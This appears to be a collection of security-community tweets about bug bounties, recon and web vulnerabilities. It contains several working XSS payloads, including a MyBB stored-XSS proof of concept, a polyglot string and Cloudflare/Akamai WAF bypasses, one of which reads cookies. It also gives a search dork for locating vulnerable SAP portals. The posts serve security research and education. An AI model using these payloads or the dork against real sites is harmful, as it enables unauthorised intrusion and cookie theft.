🎁 PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [email][email protected]?[[email protected]? onmouseover=alert(1) a]a[/email][/email] Advisory: github.com/mybb/mybb/secu…

We've just released the fourth episode of Bug Bounty Redacted! This episode is about a report where I was able to overwrite JS files via a PUT request ending up at S3 and an insecure JWT implementation. You can watch it here: youtube.com/watch?v=F7QvhH…

How to Audit a Smart Contract | Can you find the Solidity Security Vulnerabilities? youtube.com/watch?v=TmZ8gH…

🕸 Website: "Please enter your first name" 😎 You: "jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"

Angular Blind XSS Payload 1.4.0 - 1.5.8 © Gareth Heyes \u2028 #bugbountytips

With how important Attack Surface Management (ASM) has become, I've decided to launch a new series where I talk about and explain different ASM and recon methods in under 10 minutes. EP0 of ASM series is focused on the basics of ASM. Enjoy! youtu.be/sbkXpSeW77c

Find an easy #XSS that found all-over the internet. Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the url & add the payload in 2nd tweet. There are thousands of huge orgs with this #XSS, I reported > 150. Thank me later.#BugBountyTips #infosec

Thanks everyone who reached out! 😎 I've found a valid payload that requires adding the following (and ONLY this) sequence of %27%00%20, which confuses their filter for whatever reason and let me inject an on-handler after that sequence. WTF.

The internet is free university. But 99% don’t know the best spots on this virtual campus. Here are the top websites to accelerate your learning 👇

📢📢We are ecstatic to announce that Frans Rosén from Detectify will be presenting his research on "Chaining abnormal flows in OAuth to takeover accounts" at #THREATCON2022 - Bounty Track on Sep 15, Kathmandu, Nepal 🎉 Don't miss it, book your tickets now. #infosec #bugbounty

90% of my Twitter DMs are asking me about how to start getting into Malware development. Well, I love answering them but it's easier to write a small thread about it so here we go. 1/12

For those who love recon 👇🏻

Cloudflare #XSS WAF Bypass. Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F #bugbountytips #cybersecurity #infosec #xss

(XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #XSs #infosecurity #cybersecurity

7. Fuzz If you wanna go full for security, fuzz your custom functions that look a bit complicated to your eye. Remember the invariants from previous step? Now you will need it. Use Scribble (github.com/ConsenSys/scri…) to write them in a more formal way (still as comments).

cloudflare #XSS bypass via onevent: Payload : "onx+%00+onpointerenter%3dalert(domain)+x" by @brutelogic #bugbountytips #infosec #hackerone #bugcrowd #secnhack #bugbounty #websecurity #cybersecurity

Akamai WAF bypass <A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

New blog post detailing some findings from auditing the Next.js ecosystem: "Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library" Huge thanks to shubs and Brett Buerhaus for helping explore this! samcurry.net/universal-xss-…

Making HTTP header injection critical via response queue poisoning, by James Kettle portswigger.net/research/makin…

My blackhat presentation at @Synack booth about Unusual Auth Bypass Techniques now a blog post! Check it out if you haven’t already.